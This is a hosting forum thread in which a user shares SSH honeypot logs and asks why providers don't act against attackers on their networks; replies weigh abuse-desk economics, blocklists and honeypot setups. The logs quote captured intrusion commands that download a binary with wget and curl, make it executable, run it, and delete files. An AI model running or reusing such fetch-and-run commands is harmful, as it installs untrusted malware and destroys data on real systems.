New on LowEndTalk? Please Register and read our Community Rules.
All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.
All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.
Why don't providers act against abusers on their network?
I've been a passive observer of /var/log/auth.log, but wondered what would happen if the attackers managed to get in. So, I wrote a small SSH honeypot that accepts any username and password, and within minutes I had IPs from DigitalOcean, OVH, BuyVM, and others trying to install malware:
{"ts": "2021-02-25 13:07:42 UTC", "ip": "161.35.212.151", "dport": 22, "username": "oracle", "password": "oracle", "allow": true}
{"ts": "2021-02-25 13:07:42 UTC", "ip": "161.35.212.151", "dport": 22, "username": "oracle", "exec_cmd": "lscpu ; wget redacted.com/redacted ; chmod +x * ; ./ninfo ; rm -rf *"}
{"ts": "2021-02-25 14:05:46 UTC", "ip": "154.223.166.124", "dport": 22, "username": "root", "password": "p@55word", "allow": true}
{"ts": "2021-02-25 14:05:47 UTC", "ip": "154.223.166.124", "dport": 22, "username": "root", "exec_cmd": "#!/bin/sh\nPATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\nwget http://154.223.166.124/443\ncurl -O http://154.223.166.124/443\nchmod +x 443\n./443\n"}
{"ts": "2021-02-25 14:05:51 UTC", "ip": "154.223.166.124", "dport": 22, "username": "root", "exec_cmd": "ls -la /var/run/gcc.pid"}
My question is - why don't providers adopt such techniques to detect and boot abusers off their networks? The usual answer that I keep hearing is "how would they know"?
But, it seems all they need to do is run a honeypot of a similar kind on a few networks, and as soon as their IPs connect on their honeypots, they suspend the abuser (or at least, serve a notice on which they must reply in a day).
Comments
What did you they say when you reported the intrusion to them?
A lot of times it stays under the standard resource abuse limits so we don't get notifications. Also if nobody tells us about it then we don't know about it.
Also you might want to check if the abuse is coming from TOR nodes as that can sometimes send out what you are seeing.
~Josh
I think OP is asking why providers don't take proactive measures like setting up honeypots.
Most often they do, the better questions are:
And the short answer is that it's none of your business and sometimes the answers might violate their privacy policy and/or legal obligations. If you think they can't keep it under control and it bothers you, block their ranges.
And are their customers demanding that, and leaving when they don't? Or do you expect them to run a charity for you, a third party that isn't paying them a dime or causing them to have any consequences?
This is why blacklists exist, to try to crowdsource consequences for companies that might financially justify their spending to solve such things. If no one uses your blacklist to block the offending company's customers from reaching their own, then no one agrees that they deserve consequences. If no one agrees that they deserve consequences, you're probably overreacting.
I'm +1 on this.
If the automation doesn't catch it AND there are no external reports... then most providers will not even notice.
That being said, I think that most providers you will find are fast when you actually file abuse reports.
For your honeypot project: try parsing abuse addresses from sources such as whois or the ripe database,....
As an example blocklist.de does it like this:
Short answer is that most providers don't give a fcuk.
(Slightly longer answer is that they expect the intended victims to protect themselves, whilst they harbour the criminal activity.)
((Obtuse answer is how many neighbours complain about the persistent barking from their 'friendly' neighbourhood dogs? If enough done it, would it stop? More appropriate for port scanning however.))
It's not so much they (we) don't give a fcuk. It's more that we don't go looking for reasons to reduce our revenue stream.
If it's reported in a clear and reasonable way, usually (at least for us) we take action.
I do ignore a lot of 'abuse' reports. The ones that are extremely vague, unclear, inconclusive. Usually it's not a hacking related report. The most common reports we ignore are DMCA Take Down requests that DONT include our IP.
They report a domain WITHOUT an IP and the domain resolves to some other IP, such as cloudflare. Yeah I'm not going to waste time following up with cloud flare. In any case, we block cloud flare emails.
Generally speaking, if I get an abuse report that requires more than 5 mins to verify, it gets ignored. Especially when the request is coming from a commercial service who get's paid to make take down requests. Like WTF? Do your job and fill in the blanks for me, so I don't need to do your work for you! They get paid to make a case to make take down requests, so they should do the research and provide it in a clear format to the host and make it easy for the host to say "YES! THAT IS ABUSE" and shut it down. The 5 minute rule applies. Time is money and that's all the free time I'm willing to give.
Thisss here really gets on my nerves and then the complainer is consistently sending emails saying take it down but refuses to send PROOF that it's coming from our IPs.
Yes, if they keep sending bogus reports, their email gets blocked. This is actually why we blocked cloud flate.
Cloud flare dont want to handle this shit manually so they simply automate their report forwarding. In one case in particular, we responded to cloud flare to inform them that the report was invalid and no actual abuse was taking place. They do not care. They simply keep forwarding. I asked how to get them to stop forwarding as there was NO ABUSE, to which they replied, we must remove the website being reported. Since it's ridiculous to remove a website that is violating no laws, we simply blocked cloud flare.
Following up on abuse reports takes time. The onus should be on the reporter to provide as much information as possible. No info, no action. Simple
THIS. I would say most providers will respond to a valid abuse report. Can't expect us to do anything if you're providing garbage data.
Well. It happens
Maybe there was no report yet .
Once I had no abuse complaint when suddenly the authorities seized the customer dedicated server for such attacks. Ransomware attacks against other government in EU according to the documents
nice question. noted myself here for further study. thanks
I'm just going to leave this here. https://github.com/DigitalRuby/IPBan
One of the better automatic abuse reporters.
Not sure what you're trying to get at:
Is it also not in the interest of the provider in order to boot abusers off their network?
I find it hard to believe that the provider will go bankrupt running 10 honeypots on a $3 VPS, for a monthly expense of $30. (The goal is not to catch all abusers, which you can't anyway if they're using it for targeted attacks.)
Automatic abuse reporters are annoying.
Any how much resources do you think the honeypots ACTUALLY take??? CPU/RAM/ etc.
I don't "think", they actually run on 512 MB Lightsail instances and the examples that I showed in my original post are actually from one of those instances.
Why should they? They don't exist to make you feel good. They're businesses. It's the job of you and their customers to make them care. If you can't and their customers won't, they have no incentive. Don't assume that your values are universally shared as priorities. They don't hire people to care about your concerns if you're not a customer.
That's how we get back to blacklists: a commonly used method to generate incentive. If you can become the concern of their customers then you can influence their behavior. If you can't, then you will not have made a good enough case to be worthy of their investment into what you want.
Most of the attacks come from poorly secured wordpress sites and the reality is that these people running them are a backbone of the industry. Scaling down a web host by tossing out these customers to make third parties feel good doesn't reduce abuse, it just makes one hosting provider smaller and the one that doesn't give a shit about your opinion larger.
Honestly those people won't even believe that they're the problem. They'll blame their web host for their wordpress site getting hacked because "I didn't touch it and it was fine last week so must be your problem." They won't get better at hosting their websites and they won't spend a dime over $15 to deal with it, they'll keep moving until they find the provider that lets them be irresponsible. The customers don't care if their 6 year old wordpress site is brute forcing your server, doesn't bother them.
That's the real truth of the internet. That's why they're not out there hiring teams of people waiting for you to tell them how many customers to get rid of every day. Trading their revenue for no long term net impact on the end result is of zero interest to them.
If you can't tell I've been on every side of this issue at some point, so I feel pretty strongly that I understand the perspective of everyone involved. At HostGator I talked to the shitty wordpress customers who blamed me every day for their failure to update anything ever. At DigitalOcean I dealt with the most arrogant abuse reporters who thought I owed them action against my customers. At MXroute I deal with the inbound abuse from shitty hosts that ignore complaints. Everyone has an angle, but influence is easiest when you understand all of them.
That's a valuable insight, I appreciate it
So, it's just a case of "because no one else is doing it, customers would leave the host that enforces such terms", and maybe regulation in this respect is the only way forward.
Honestly just look at this website. There is hosting providers that pop up and die in the same year. The bigger hosts that are here deal with abuse accordingly when given proper proof of said abuse if from their services.
That is a lot more than you can say with the big providers (AWS, Google, Azure, DO, Vultr, etc.)
With stricter regulation will cause those Big providers to become even more bigger because they can get away with stuff the smaller hosts cannot.
That might be a uncharitable view, but regulations do increase costs for everyone which means startups or small businesses are disproportionately affected.
Appreciate your and @jar's views -- it was a transformative experience to be exposed to the view of the business owner or the support rep who has to deal with the underlying problem, which they can't address directly because of societal and economic constraints.
@stevewatson301
Rule no. 1: There is no cushions and you are alone in the internet jungle.
Rule no. 2: The states, police, etc. are not up to par nor do they really care.
Rule no. 3: The true and only god of both companies and states is profit. You the customer and citizen are but an irritating necessity.
Rule no. 4: Consumers don't really care, much less learn or act responsibly. They want to consume.
(There are, of course sadly rare exceptions).
Hence what is an abuser to you is a source of revenue for a provider. As long as a provider can reasonably say he didn't know, e.g. because certain (rather high) levels haven't been reached, he will not decide for your well-being but for his revenue. And there is neither clear and real determination and rules nor the capability to go against but a few high profile cases on the state's side. Hell, most states even can't protect their own infrastructure!
The other big point is that most people not only aren't particularly smart and well educated but worse, they have a "someone will protect me" attitude, that someone typically being either the state, some (usually snake oil) product or service or some authority (e.g. "linux is secure", "those pros know what they are doing").
The chance of abusers scanning their neighbors is very small. If providers do what you said, they will most likely log many IPs from others' networks, which they can't suspend.
Providers do act when you report with proper information. I know that because sometimes they will relay the response of their customers to me. But some can't even get their abuse contact in WHOIS correct.
The smallest VPS I use for detection has 128MB RAM. It monitors 10K TCP ports with HAProxy and detected malicious connection attempts from 12K+ IPs yesterday. Detection doesn't need much CPU power.
The most important resource is an IPv4 address, without it your detection ability will be greatly limited.
Is your honeypot just a "dumb" receiver of TCP connections, or do they actually provide any interaction?
Interaction gets you many more IPs than you would otherwise, because once a vulnerable host has been detected, you get the abusers contacting from many other IPs.
With service providers like Microsoft/Google etc should simply block any traffic if you have constant connections with success? How provider can know if this usual custom services configured on the instance? Only if it's managed services and they get notifications of unusual activity, right? if that server is unmanaged, no abuses no cases from a client.. they should log into every instance to check everything? I doubt, only if this is a party of services. However, if this not reported at the very beginning you can easily claim they are playing with your personal data without any ask? For sure there will be a moment when a provider will start looking for such VPS:
No abuses or performance degradation - no problems at the end
Most of those malicious connections, I believe, come from compromised systems. I just want to make the victims aware of what happened to their computers. My HAProxy is indeed a "dumb" receiver of TCP connections, as I don't have the time and technique necessary to analyze hackers' attacking strategies, nor am I interested in that. HAProxy's log has given me enough information to report those incidents.
I am not sure. Even it's true, what I lose due to no interaction, I can compensate by monitoring tens of thousands of TCP ports. In fact, if your honeypot is not "forking" in nature, I would suggest that you use HAProxy to proxy as many TCP ports as possible to your honeypot. You would find even more abusers this way.
It's not about the resources honeypots would utilize or how much it'd cost. Providers are trying to run a business. They have 1000 things to do that take priority over setting up honeypots to catch abusers on their network. What incentive do they have to spend time setting up, managing, and maintaining honeypots? Appeasing someone who isn't a customer and doesn't pay them a dime?
Newsflash, the primary goal of any business is to make money. No provider in their right mind is going to dedicated manpower, resources, and money to intentionally downsize their customer base.
Don't get me wrong, no one likes abuse on their network, not the provider, nor the victims. However, you can't expect providers with thousands of clients to dedicate resources to self police their network and seek out abusers. This is the whole reason why abuse desks exist.
You don't need HAProxy for that, you can just use iptables DNAT rules to forward traffic from any TCP port to your honeypot and then use getsockopt(SO_ORIGINAL_DST) to get the original destination port.
Some providers can take your sister for spam abuse. @cociu does that. I was at risk one time!